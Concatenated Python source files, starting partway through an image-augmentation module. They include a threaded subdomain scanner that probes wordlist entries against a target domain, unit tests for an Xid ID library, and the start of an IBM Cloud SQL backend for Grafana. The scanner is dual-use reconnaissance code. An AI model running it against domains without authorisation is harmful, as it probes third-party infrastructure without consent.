    height = img.shape[0] + border[0] * 2  # shape(h,w,c)
    width = img.shape[1] + border[1] * 2

    # Center: move the image center to the origin before the other transforms
    C = np.eye(3)
    C[0, 2] = -img.shape[1] / 2  # x translation (pixels)
    C[1, 2] = -img.shape[0] / 2  # y translation (pixels)

    # Perspective
    P = np.eye(3)
    P[2, 0] = random.uniform(-perspective, perspective)  # x perspective (about y)
    P[2, 1] = random.uniform(-perspective, perspective)  # y perspective (about x)

    # Rotation and Scale
    R = np.eye(3)
    a = random.uniform(-degrees, degrees)
    # a += random.choice([-180, -90, 0, 90])  # add 90deg rotations to small rotations
    s = random.uniform(1 - scale, 1 + scale)
    # s = 2 ** random.uniform(-scale, scale)
    R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)

    # Shear
    S = np.eye(3)
    S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180)  # x shear (deg)
    S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180)  # y shear (deg)

    # Translation
    T = np.eye(3)
    T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width  # x translation (pixels)
    T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height  # y translation (pixels)

    # Combined rotation matrix
    M = T @ S @ R @ P @ C  # order of operations (right to left) is IMPORTANT
    if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any():  # image changed
        if perspective:
            img = cv2.warpPerspective(img, M, dsize=(width, height), borderValue=(114, 114, 114))
        else:  # affine: only the top 2x3 of M is needed
            img = cv2.warpAffine(img, M[:2], dsize=(width, height), borderValue=(114, 114, 114))

    # Visualize
    # import matplotlib.pyplot as plt
    # ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
    # ax[0].imshow(img[:, :, ::-1])  # base
    # ax[1].imshow(img2[:, :, ::-1])  # warped

    # Transform label coordinates
    n = len(targets)
    if n:
        use_segments = any(x.any() for x in segments)
        new = np.zeros((n, 4))
        if use_segments:  # warp segments point-by-point, then rebox
            segments = resample_segments(segments)  # upsample
            for i, segment in enumerate(segments):
                xy = np.ones((len(segment), 3))
                xy[:, :2] = segment
                xy = xy @ M.T  # transform (homogeneous coordinates)
                xy = xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2]  # perspective rescale or affine
                # clip happens inside segment2box
                new[i] = segment2box(xy, width, height)
        else:  # warp all 4 corners of each box
            xy = np.ones((n * 4, 3))
            xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2)  # x1y1, x2y2, x1y2, x2y1
            xy = xy @ M.T  # transform
            xy = (xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2]).reshape(n, 8)  # perspective rescale or affine
            # create new axis-aligned boxes from the warped corners
            x = xy[:, [0, 2, 4, 6]]
            y = xy[:, [1, 3, 5, 7]]
            new = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
            # clip
            new[:, [0, 2]] = new[:, [0, 2]].clip(0, width)
            new[:, [1, 3]] = new[:, [1, 3]].clip(0, height)

        # filter candidates: drop boxes that shrank or distorted too much
        i = box_candidates(box1=targets[:, 1:5].T * s, box2=new.T, area_thr=0.01 if use_segments else 0.10)
        targets = targets[i]
        targets[:, 1:5] = new[i]
    return img, targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.1, eps=1e-16):  # box1(4,n), box2(4,n)
    """Return a boolean mask of augmented boxes worth keeping.

    box1 holds pre-augment boxes, box2 post-augment boxes, both as (4, n)
    x1/y1/x2/y2 rows. A box survives when it is still larger than `wh_thr`
    pixels per side, kept more than `area_thr` of its area, and its aspect
    ratio stays below `ar_thr`.
    """
    w_before, h_before = box1[2] - box1[0], box1[3] - box1[1]
    w_after, h_after = box2[2] - box2[0], box2[3] - box2[1]
    aspect = np.maximum(w_after / (h_after + eps), h_after / (w_after + eps))
    big_enough = (w_after > wh_thr) & (h_after > wh_thr)
    kept_area = w_after * h_after / (w_before * h_before + eps) > area_thr
    return big_enough & kept_area & (aspect < ar_thr)
def cutout(image, labels):
    """Apply Cutout augmentation (https://arxiv.org/abs/1708.04552): paint
    randomly-sized, randomly-coloured rectangles over the image and drop any
    labels that end up mostly hidden.

    Mutates `image` in place and returns the surviving labels.
    """
    h, w = image.shape[:2]

    def bbox_ioa(box1, box2):
        """Intersection of box1 with each row of box2, over box2's area.
        box1 is length-4, box2 is (n, 4); boxes are x1y1x2y2."""
        box2 = box2.transpose()
        b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
        b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
        inter = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
                (np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
        area2 = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16  # avoid div-by-zero
        return inter / area2

    # one half-size mask, two quarter-size, four eighth-size, ... (image-size fractions)
    scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16
    for frac in scales:
        mask_h = random.randint(1, int(h * frac))
        mask_w = random.randint(1, int(w * frac))

        # random box, clipped to the image bounds
        xmin = max(0, random.randint(0, w) - mask_w // 2)
        ymin = max(0, random.randint(0, h) - mask_h // 2)
        xmax = min(w, xmin + mask_w)
        ymax = min(h, ymin + mask_h)

        # paint the mask with a random mid-range colour
        image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]

        # keep only labels that are not obscured by more than 60%
        if len(labels) and frac > 0.03:
            box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
            ioa = bbox_ioa(box, labels[:, 1:5])  # intersection over label area
            labels = labels[ioa < 0.60]

    return labels
def create_folder(path='./new'):
    """Create an empty directory at `path`, removing any existing one first."""
    if os.path.exists(path):
        shutil.rmtree(path)  # start from a clean slate
    os.makedirs(path)
def flatten_recursive(path='../coco128'):
    """Copy every file found recursively under `path` into a new sibling
    directory named '<path>_flat' (top level only, names may collide)."""
    flat_dir = Path(path + '_flat')
    create_folder(flat_dir)
    for src in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
        shutil.copyfile(src, flat_dir / Path(src).name)
def extract_boxes(path='../coco128/'):  # from utils.datasets import *; extract_boxes('../coco128')
    """Convert a detection dataset into a classification dataset: write one
    cropped image per labelled box under <path>/classifier/<class>/.

    Each crop is padded by 20% + 3 px and clipped to the image bounds.
    Raises AssertionError if a crop cannot be written.
    """
    path = Path(path)  # images dir
    shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None  # remove existing
    files = list(path.rglob('*.*'))
    n = len(files)  # number of files
    for im_file in tqdm(files, total=n):
        if im_file.suffix[1:] in img_formats:
            # image (BGR to RGB)
            im = cv2.imread(str(im_file))[..., ::-1]
            h, w = im.shape[:2]

            # labels
            lb_file = Path(img2label_paths([str(im_file)])[0])
            if Path(lb_file).exists():
                with open(lb_file, 'r') as f:
                    lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32)  # labels

                for j, x in enumerate(lb):
                    c = int(x[0])  # class
                    f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg'  # new filename
                    if not f.parent.is_dir():
                        f.parent.mkdir(parents=True)

                    b = x[1:] * [w, h, w, h]  # box, denormalized to pixels
                    # b[2:] = b[2:].max()  # rectangle to square
                    b[2:] = b[2:] * 1.2 + 3  # pad
                    # FIX: np.int was deprecated (NumPy 1.20) and removed (1.24);
                    # the builtin int is the documented replacement
                    b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(int)

                    b[[0, 2]] = np.clip(b[[0, 2]], 0, w)  # clip boxes outside of image
                    b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
                    assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path='../coco128', weights=(0.9, 0.1, 0.0), annotated_only=False):
    """Autosplit a dataset into train/val/test splits and write
    path/autosplit_*.txt list files.

    Usage: from utils.datasets import *; autosplit('../coco128')

    Arguments
        path:           Path to images directory
        weights:        Train, val, test weights (sequence of 3)
        annotated_only: Only use images with an annotated txt file
    """
    root = Path(path)  # images dir
    images = sum([list(root.rglob(f"*.{img_ext}")) for img_ext in img_formats], [])  # image files only
    total = len(images)
    split_ids = random.choices([0, 1, 2], weights=weights, k=total)  # one split per image
    split_files = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt']
    [(root / name).unlink() for name in split_files if (root / name).exists()]  # drop stale lists
    print(f'Autosplitting images from {root}' + ', using *.txt labeled images only' * annotated_only)
    for split_id, image in tqdm(zip(split_ids, images), total=total):
        if not annotated_only or Path(img2label_paths([str(image)])[0]).exists():  # label must exist
            with open(root / split_files[split_id], 'a') as f:
                f.write(str(image) + '\n')
|
fast_subdomain_scanner.py | import requests
from threading import Thread, Lock
from queue import Queue
q = Queue()
list_lock = Lock()
discovered_domains = []
def scan_subdomains(domain):
    """Worker loop: pull candidate subdomain names off the shared queue,
    probe http://<sub>.<domain>, and record the ones that respond.

    Runs forever (intended for daemon threads). Any HTTP response at all —
    including 4xx/5xx — counts as discovered; only connection failures are
    skipped.
    """
    global q
    while True:
        # get the subdomain from the queue (blocks until one is available)
        subdomain = q.get()
        # scan the subdomain
        url = f"http://{subdomain}.{domain}"
        try:
            requests.get(url)
        except requests.ConnectionError:
            pass
        else:
            print("[+] Discovered subdomain:", url)
            # add the subdomain to the global list (lock: many workers append)
            with list_lock:
                discovered_domains.append(url)
        # we're done with scanning that subdomain
        q.task_done()
def main(domain, n_threads, subdomains):
    """Enqueue every candidate subdomain and launch the scanning workers."""
    global q
    # fill the queue with all the subdomains to test
    for name in subdomains:
        q.put(name)
    # start the worker pool
    for _ in range(n_threads):
        worker = Thread(target=scan_subdomains, args=(domain,))
        # daemon: workers die automatically when the main thread exits
        worker.daemon = True
        worker.start()
if __name__ == "__main__":
    import argparse
    parser = argparse.ArgumentParser(description="Faster Subdomain Scanner using Threads")
    parser.add_argument("domain", help="Domain to scan for subdomains without protocol (e.g without 'http://' or 'https://')")
    parser.add_argument("-l", "--wordlist", help="File that contains all subdomains to scan, line by line. Default is subdomains.txt",
                        default="subdomains.txt")
    parser.add_argument("-t", "--num-threads", help="Number of threads to use to scan the domain. Default is 10", default=10, type=int)
    parser.add_argument("-o", "--output-file", help="Specify the output text file to write discovered subdomains")
    args = parser.parse_args()
    domain = args.domain
    wordlist = args.wordlist
    num_threads = args.num_threads
    output_file = args.output_file

    # read the wordlist with a context manager so the handle is closed promptly
    with open(wordlist) as wl:
        subdomains = wl.read().splitlines()
    main(domain=domain, n_threads=num_threads, subdomains=subdomains)
    q.join()  # wait until every queued subdomain has been processed

    # FIX: only write results when -o/--output-file was given; previously a
    # missing option crashed here with TypeError: open(None)
    if output_file:
        with open(output_file, "w") as f:
            for url in discovered_domains:
                print(url, file=f)
|
xid_test.py | import unittest
from xid import Xid
# Known-good test vectors taken from the reference Go implementation:
# https://github.com/rs/xid/blob/master/id_test.go
# Each entry pairs a 12-byte Xid with the timestamp, machine id, pid and
# counter fields it should decode to.
TestXids = [
    {
        'xid': Xid([0x4d, 0x88, 0xe1, 0x5b, 0x60, 0xf4, 0x86, 0xe4, 0x28, 0x41, 0x2d, 0xc9]),
        'ts': 1300816219,
        'machine': ''.join(map(chr, [0x60, 0xf4, 0x86])),
        'pid': 0xe428,
        'counter': 4271561
    },
    {
        # all-zero id: every decoded field must be zero/empty
        'xid': Xid([0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]),
        'ts': 0,
        'machine': ''.join(map(chr, [0x00, 0x00, 0x00])),
        'pid': 0x0000,
        'counter': 0
    },
    {
        'xid': Xid([0x00, 0x00, 0x00, 0x00, 0xaa, 0xbb, 0xcc, 0xdd, 0xee, 0x00, 0x00, 0x01]),
        'ts': 0,
        'machine': ''.join(map(chr, [0xaa, 0xbb, 0xcc])),
        'pid': 0xddee,
        'counter': 1
    }
]
class TestXid(unittest.TestCase):
    """Unit tests for the Python Xid port, cross-checked against rs/xid (Go)."""

    def test_no_duplicates(self):
        # 1000 freshly generated ids must all be distinct
        collect = []
        for i in range(0, 1000):
            collect.append(Xid())
        ids = [i.string() for i in collect]
        self.assertEqual(len(set(ids)), 1000)

    def test_from_string(self):
        # round-trip: string() -> from_string() preserves value/bytes/string
        x = Xid()
        y = Xid.from_string(x.string())
        self.assertEqual(x.value, y.value)
        self.assertEqual(x.bytes(), y.bytes())
        self.assertEqual(x.string(), y.string())

    def test_xid_always_reversible(self):
        # encode/decode must be stable for many random ids
        for i in range(1000):
            s = Xid().string()
            self.assertEqual(Xid.from_string(s).string(), s)

    def test_timestamp(self):
        # decoded timestamp matches the reference vectors
        for x in TestXids:
            self.assertEqual(x.get('xid').time(), x.get('ts'))

    def test_machine(self):
        for x in TestXids:
            self.assertEqual(x.get('xid').machine(), x.get('machine'))

    def test_pid(self):
        for x in TestXids:
            self.assertEqual(x.get('xid').pid(), x.get('pid'))

    def test_counter(self):
        for x in TestXids:
            self.assertEqual(x.get('xid').counter(), x.get('counter'))

    def test_copy_array_from_golang(self):
        # encoding a byte array from the Go test suite yields the Go string
        x = Xid([0x4d, 0x88, 0xe1, 0x5b, 0x60, 0xf4,
                 0x86, 0xe4, 0x28, 0x41, 0x2d, 0xc9])
        self.assertEqual('9m4e2mr0ui3e8a215n4g', x.string())

    def test_copy_string_from_golang(self):
        # decoding the Go string yields the Go byte array
        x = Xid.from_string('9m4e2mr0ui3e8a215n4g')
        self.assertEqual(x.value, [0x4d, 0x88, 0xe1, 0x5b, 0x60, 0xf4,
                                   0x86, 0xe4, 0x28, 0x41, 0x2d, 0xc9])

    def test_thread_safety(self):
        # generate ids from many threads; mainly checks nothing raises
        import threading
        threads = []

        def worker():
            for i in range(10):
                # NOTE(review): result is discarded — this exercises concurrent
                # generation but does not assert cross-thread uniqueness
                threading.current_thread().ident, Xid().string()

        for i in range(10):
            t = threading.Thread(target=worker)
            threads.append(t)
            t.start()
        for t in threads:
            t.join()


if __name__ == '__main__':
    unittest.main()
|
app.py | # ------------------------------------------------------------------------------
# Copyright IBM Corp. 2020
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------
"""WSGI-based web app
(Python 3.8 compatible)
https://stackoverflow.com/questions/32799808/python-web-application-project-structure-and-docker-support
1. able to process and store connection to Cloud SQL server [json database file]
2. able to process `table` and `time-series` request and return data
3. handle empty request string
4. handle empty returned data
5. able to handle request in concurrent -> thread-specific or coroutine-specific sqlClient object
6. able to handle NaN data and convert to empty string before returning
7. support special functions: $__timeFilter() and $__timeFilter(aiops) -
assumes the time column is a number, i.e. long type or timestamp type
8. allow caching based on `key` and sql_stmt
9. columns detection in SELECT statement:
SELECT name
SELECT fake as name
SELECT ts_explode(...) AS (name1, name2)
10. support special functions: $__source (HIVE table and COS URL)
11. add streaming time-series and multi-times series: $__source_test(TS), $__source_test(MTS)
12. can handle multiple queries at once
13. handle 'hide=True' when user don't want to run a query
14. add 'get_result' option to allow not returning any result back - good for chained queries
15. add '--time-out' option [to pass in the value (in seconds) before timeout when
the webapp is launched as a service in IBM CloudEngine for example]
16. add '--ssl' option [to run HTTPS Webserver]
17. support using $__source in CREATE TABLE statement
18. $__timeFilter(string) - now accepts 'string' if the time column is represented as a string
19. a 'time' column is now automatically converted to datetime - if it's stored in string
20. able to detect column name correctly even inside a nested SELECT statement [Feb 12, 2021]
21. able to detect and reject 'SELECT *'
22. add new macro: '$__timeFilterColumn(col-name, [type])' - user can explicitly specify
the column containing timestamp-data, and need to provide its type
(string or long/timestamp or empty) [Feb 12, 2021]
23. add iam_max_tries
24. add and use the thin-version of query-data so that memcached no longer caches the data - it only tracks the job_id (just like the get_result=False scenario) and uses this to pull the data from COS
25. enhance column extraction: support the present of 'distinct' and 'all' in the select column
26. func_get_macro_mapping argument: now can be either the string or a function that returns a string
27. save data is now guaranteed to be safe from interrupt, e.g. Ctrl-C
28. job_id is now part of the saving to the state of CloudSQLDB.
29. if a query is switched from get_result=True to False, it won't be rerun, based on change in (24).
30. stop using (24) as the default - cache the whole data. The reason is that request the data from COS is still having significant delay.
31. add singletonSqlClient: apply TS-related query transformation before using that content for tracking query.
32. TooManyRowsException: add the check for number of rows limit: prevent Grafana client from waiting for transferring too large data
33. NoResultException: add the check for query without any returned data
CHANGED BEHAVIOR:
* [grafana] revise conf. setting so that $__source is optional - with tooltips to explain why user should provide
* [grafana] add $__dest to use the default one - $__dest(csv): $__dest, $__dest(), $__dest(csv)
$__dest(parquet), $__dest(arvo, a/b/c)
* add $__source_prev, $__source_prev(), $__source_prev(A), $__source_prev(B) to refer to the
data source as the output from a previous query, or a given query based on its `refId` A or B.
* avoid re-create sqlClient in a panel with multiple queries
* use status code 403, rather than 401, for error: newer Grafana 7.3.x for some reasons
maps 401 to 400 and the original message is lost
* check `should_sql_stmt_be_run` move to outside the loop --> faster for a panel
with multiple queries
(the check is not vigorous - sql is compared before any transformation done so that
adjacent spaces are also considered)
* HTTPS/SSL is added (--ssl)
code:
$__dest[( format [, suffix] )]
TODO:
* add the capability to reference a variable - so that the dashboard can be updated based on the
value(s) user selected for that variable
* add $__get_schema(hivetable), $__get_schema(COS://URL, format), $__get_schema($__source)
BUG fixes:
1. when metrics name is not a string
2. detect column name properly when a comment is right after it
"""
try:
    # A gevent-based server is not truly asynchronous, but massively
    # multi-threaded; monkey-patching makes the stdlib cooperative so
    # concurrent requests can overlap on I/O.
    import gevent
    from gevent import monkey
    monkey.patch_all()
except ImportError:
    # gevent is optional: fall back to plain (serial) request handling.
    # FIX: a bare `except:` previously swallowed SystemExit/KeyboardInterrupt too.
    print("No concurrency")
import math
import os
import random
import re
import sys
from calendar import timegm
from datetime import date, datetime
from enum import Enum
from time import sleep
import ibm_botocore
import numpy as np
import regex
from bottle import Bottle, HTTPResponse, run, request, response
from bottle import json_dumps
try:
import cPickle as pickle
except ImportError:
import pickle
from pandas.io.json import build_table_schema
import json
import sqlparse
from sqlparse.sql import IdentifierList, Identifier
from sqlparse.tokens import Keyword
import logging
import pandas as pd
import threading
from threading import Thread
from joblib import Memory
sys.path.insert(0, "../../Python/")
try:
from cloud_utilities.sql_query import SQLClient
from cloud_utilities.sql_magic import format_sql
from cloud_utilities.cos import ParsedUrl
except ImportError:
from ibmcloudsql.sql_query_ts import SQLClientTimeSeries as SQLClient
from ibmcloudsql.sql_magic import format_sql
from ibmcloudsql.cos import ParsedUrl
from ibmcloudsql.exceptions import (
CosUrlNotFoundException,
CosUrlInaccessibleException,
SqlQueryCrnInvalidFormatException,
RateLimitedException,
)
logger = logging.getLogger()  # root logger: the handlers below apply app-wide

# since Python 3.3 (basicConfig accepts `handlers`)
logging.basicConfig(
    # level=logging.DEBUG,
    level=logging.INFO,
    format="%(asctime)s [%(threadName)-12.12s] [%(levelname)s] %(message)s",
    handlers=[logging.FileHandler("debug.log"), logging.StreamHandler()],
)

IAM_MAX_TRIES = 5  # max attempts for IAM-related retries (changelog item 23) — usage not visible here
DEBUG = False  # extra diagnostics when True
MAX_TRIES = 100  # generic retry cap — presumably for polling loops; confirm at usage sites
def get_parser():
    """Parse the webapp's command-line options.

    --time-out/-t: request time-out in seconds (kept as a string; None means
    unlimited). --ssl: serve over HTTPS.
    """
    import argparse

    parser = argparse.ArgumentParser(description="Process backend webapp")
    parser.add_argument(
        "--time-out",
        "-t",
        dest="time_out",
        help="the time-out of request in seconds (default: unlimited)",
    )
    parser.add_argument(
        "--ssl", dest="ssl", action="store_true", help="run as HTTPS web server"
    )
    return parser.parse_args()
# Serialises the cached-query path in query_data() across request threads.
lock = threading.Lock()
# Second lock, presumably guarding job-state saves — usage not visible in this section.
lock_savejob = threading.Lock()

# use this to transform TS-related query to CloudSQL-compliant form
# singletonSqlClient = SQLClient()

# command-line arguments, parsed once at import time
cmd_args = get_parser()

# joblib disk cache; the memoised helpers below key on (key, sql_stmt)
cachedir = "_cache_dir"
memory = Memory(cachedir, verbose=0)
def query_data(key, key_refId, sql_stmt, rerun=False, sqlClient=None):
    """Run `sql_stmt` and return (DataFrame-or-None, job_id).

    Two modes, selected by the --time-out CLI flag:
    * no time-out: execute synchronously, going through the joblib cache
      unless `rerun` forces a fresh execution;
    * with time-out: submit asynchronously, remember the job_id per
      (key, key_refId), and poll until the job completes.

    `key` identifies the sqlClient instance; `key_refId` identifies the
    dashboard/panel/query the statement belongs to.
    """
    if cmd_args.time_out is None:
        # no time-out
        # df = sqlClient.run_sql(sql_stmt)
        df = None
        if rerun:
            # bypass the cache and execute again
            if sqlClient is None:
                sqlClient = grafanaPluginInstances.get_sqlclient(key, thread_safe=True)
            res = sqlClient.execute_sql(sql_stmt, get_result=True)
            df, job_id = res.data, res.job_id
        else:
            with lock:
                # normalise the statement first so the cache key is canonical
                sql_stmt = grafanaPluginInstances.get_sqlclient(key, thread_safe=True).human_form_to_machine_form(sql_stmt)
                df, job_id = _query_data_with_result(key, sql_stmt, sqlClient)
                if isinstance(df, str):
                    # the cached helper may hand back a string placeholder; treat as no data
                    df = None
        return df, job_id
    else:
        # with time-out
        if rerun:
            # not supported - need to implement a mechanism in that a rerun query with timeout
            # would not lead to another rerun (i.e. automatically switch off the rerun
            # flag at Grafana plugin level) --> so that the next one to retrieve the data only
            assert 0
        else:
            job_id = grafanaPluginInstances.get_job_id(key, key_refId)
            if job_id is None:
                # first time we see this query: submit it and remember the job
                job_id = sqlClient.submit_sql(sql_stmt)
                grafanaPluginInstances.save_job_id(key, key_refId, job_id)
            job_status = sqlClient.wait_for_job(job_id, sleep_time=10)
            df = None
            if job_status == "completed":
                df = sqlClient.get_result(job_id)
        # check if job_id is present
        # if so, check if job status is completed
        #  - if so, get the data
        #  if not, wait until time-out
        #  if time-out and still no result, send the error message back to wait a little bit and launch again
        # TODO: add a time-start here
        # WARNING: multi-queries lead to fail of returning job-list (429 error) --> need to consult Torsten to fix on their side
        # while not sqlClient.has_available_slot():
        #     # TODO - add a time-window check here (subtracting time-start)
        #     # when it is closed to service timeout, e.g. 10min for CloudFunction or CodeEngine
        #     # returns the proper message asking to rerun again
        #     # NOTE: better if the time-out is known - as there is no way to know how the time-out is configured for now
        #     # e.g. on-premise there is no time-out necessary
        #     time.sleep(4)  # seconds
        # if rerun:
        #     # doesn't support rerun on a system with time-out
        #     assert(0)
        #     sqlClient = grafanaPluginInstances.get_sqlclient(key, thread_safe=True)
        #     res = sqlClient.execute_sql(sql_stmt, get_result=True)
        #     df, job_id = res.data, res.job_id
        # else:
        #     df, job_id = _query_data_with_result(key, sql_stmt)
        # sqlClient = grafanaPluginInstances.get_sqlclient(key, thread_safe=True)
        # df = sqlClient.get_result(job_id)
        # print("SQL URL: ", sqlClient.sql_ui_link())
        return df, job_id
def query_data_noresultback(key, sql_stmt, rerun=False, sqlClient=None):
    """Run `sql_stmt` without fetching the result; return only the job_id.

    Used for chained queries where a later query reads this one's output
    from COS. Mirrors query_data() but always passes get_result=False.
    """
    if cmd_args.time_out is None:
        # no time-out
        if rerun:
            # force a fresh execution, bypassing the joblib cache
            if sqlClient is None:
                sqlClient = grafanaPluginInstances.get_sqlclient(key, thread_safe=True)
            res = sqlClient.execute_sql(sql_stmt, get_result=False)
            job_id = res.job_id
        else:
            job_id = _query_data_noresultback(key, sql_stmt, sqlClient)
    else:
        # with time-out
        if rerun:
            # rerun is not supported when a time-out is configured: this
            # assert is always False inside this branch and aborts on purpose
            assert cmd_args.time_out is None
            if sqlClient is None:
                sqlClient = grafanaPluginInstances.get_sqlclient(key, thread_safe=True)
            res = sqlClient.execute_sql(sql_stmt, get_result=False)
            job_id = res.job_id
        else:
            job_id = _query_data_noresultback(key, sql_stmt, sqlClient)
    return job_id
@memory.cache(ignore=["sqlClient"])
def _query_data_with_result(key, sql_stmt, sqlClient=None):
    """Execute `sql_stmt` and fetch its result; disk-cached on (key, sql_stmt).

    `sqlClient` is excluded from the cache key so passing a pre-built client
    does not defeat caching. Returns (data, job_id).
    """
    if sqlClient is None:
        sqlClient = grafanaPluginInstances.get_sqlclient(key, thread_safe=True)
    res = sqlClient.execute_sql(sql_stmt, get_result=True)
    # print("SQL URL: ", sqlClient.sql_ui_link())
    return res.data, res.job_id
@memory.cache(ignore=["sqlClient"])
def _query_data_noresultback(key, sql_stmt, sqlClient=None):
    """Execute `sql_stmt` without fetching data; disk-cached on (key, sql_stmt).

    Returns only the job_id, so the cache tracks the job rather than its data.
    """
    if sqlClient is None:
        sqlClient = grafanaPluginInstances.get_sqlclient(key, thread_safe=True)
    res = sqlClient.execute_sql(sql_stmt, get_result=False)
    # print("SQL URL: ", sqlClient.sql_ui_link())
    return res.job_id
# --- pre-compiled macro patterns -------------------------------------------
# $__timeFilter([type]): time-range filter; the optional argument names the
# time column's representation (e.g. string)
regex_timeFilter = r"\$__timeFilter\s*\((\s*\w*\s*)\)"
p_timeFilter = re.compile(regex_timeFilter)
# $__timeFilterColumn(col-name, [type]): explicit time column plus its type
regex_timeFilterColumn = r"\$__timeFilterColumn\s*\((\s*\w*\s*),(\s*\w*\s*)\)"
p_timeFilterColumn = re.compile(regex_timeFilterColumn)

# $__source after FROM; the (?!_) keeps $__source_prev / $__source_test from matching
regex_source = r"(?<=(?i:FROM)\s)\s*\$__source(?!_)(\s*\(\s*\))?(?=[\b|\n|\s])?"
p_cos_in = re.compile(regex_source)
# $__source after USING (CREATE TABLE support)
regex_source = r"(?<=(?i:USING)\s)\s*\$__source(?!_)(\s*\(\s*\))?(?=[\b|\n|\s])?"
p_cos_in_using = re.compile(regex_source)

# $__source_test(TS|MTS): streaming test sources
regex_source = r"(?<=(?i:FROM)\s)\s*\$__source_test(\s*\(\s*\w*\s*\))?(?=[\b|\n|\s])?"
p_cos_in_test = re.compile(regex_source)

# $__source_prev(refId): use a previous query's output as the data source
regex_source = r"(?<=(?i:FROM)\s)\s*\$__source_prev(\s*\(\s*\w*\s*\))(?=[\b|\n|\s])?"
p_cos_in_prev = re.compile(regex_source)

# INTO $__dest[(format[, suffix])]: query output destination
regex_source = r"(?i:INTO)\s*\$__dest(\s*\([\s|\w|,|/]*\))?(?=[\b|\n|\s])?"
p_cos_out = re.compile(regex_source)

# SELECT TS_EXPLODE(...) AS (real_col1, real_col2)
regex_ts_explode = (
    r"(?i)\s*(ts_explode)[\(|\w|\s|\)|\d|,]+[aA][sS]\s*\((.*)\s*,\s*(.*)\)"
)
p_ts_explode = re.compile(regex_ts_explode)
# SELECT fake_col AS real_col
regex_as_column = r"\s*[\w|\s]+[aA][sS]\s+(\w+)\s*$"
p_as_column = re.compile(regex_as_column)
# SELECT real_col
regex_column = r"^\s*(\w+)\s*$"
p_column = re.compile(regex_column)
# nested SELECT statement; the recursive (?R) construct requires the
# third-party `regex` module (stdlib `re` does not support it)
regex_nested_select = r"(?i)\(((?>[^\(\)]+|(?R))*)\)"
p_nested_select = regex.compile(regex_nested_select)
def gen_key(id, name):
    """Build the lookup key that locates the sqlClient object for a datasource."""
    # TODO - this may not work when the single webapp serves different Grafana instances
    # --> there is a chance that the same 'id' is shared by these Grafana instances.
    return "-".join([str(id), name])
def gen_key_refId(dashboardId, panelId, refId):
    """Build the per-query key from (dashboard, panel, sql refId)."""
    return str(dashboardId) + "-" + str(panelId) + "-" + refId
def json_serial(obj):
    """JSON serializer for objects the default encoder can't handle.

    Supports datetime/date via ISO-8601; raises TypeError for anything else.
    """
    if not isinstance(obj, (datetime, date)):
        raise TypeError("Type %s not serializable" % type(obj))
    return obj.isoformat()
def find_column_mapping(sql_stmt, columns):
    """Given the outer SELECT statement, which may contain columns defined
    as e.g. first(my_col) as new_col, find the mapping from 'my_col' to
    'new_col'.

    Note: the `columns` parameter is currently unused.

    Returns
    -------
    dict:
        {inner_column_name: alias}
    """

    def get_mapping(stmt):
        """Return the alias mapping for one identifier like 'fn(col) as alias'."""
        # st AS column
        res = re.search(r"(?i)\s*([\w|\s]+)\(([^\)]+)\)\s*[a][s]\s+(\w+)\s*$", stmt)
        if res:
            return {res.group(2): res.group(3)}
        else:
            return {}

    mapping = {}
    parsed = sqlparse.parse(sql_stmt)
    try:
        stmt = parsed[0]
    except IndexError as e:
        # unparseable statement: log it before propagating
        print(sql_stmt)
        print(parsed)
        raise e
    # assert(stmt.get_type() == "SELECT")
    for token in stmt.tokens:
        if isinstance(token, IdentifierList):
            for identifier in token.get_identifiers():
                res = get_mapping(str(identifier))
                mapping.update(res)
        if isinstance(token, Identifier):
            res = get_mapping(str(token))
            mapping.update(res)
        if token.ttype is Keyword:  # first keyword after the select list (FROM): stop
            break
    return mapping
def parse_sql_columns(sql):
    """Return the output columns of `sql`, including those selected by any
    nested SELECT statements."""
    return get_columns_from_single_select(sql) + parse_inner_selects(sql)
def parse_inner_selects(sql_stmt):
    """Find every parenthesised inner SELECT in `sql_stmt` and collect the
    columns each one selects.

    Relies on the module-level recursive pattern `p_nested_select` to match
    balanced parentheses.
    """

    def find_nested_selects(stmt):
        # FIX: this previously searched the closure variable `sql_stmt`
        # instead of its own argument; harmless at the single call site
        # below, but wrong for any other caller.
        candidates = p_nested_select.findall(stmt)
        nested = []
        for fragment in candidates:
            fragment = fragment.strip()
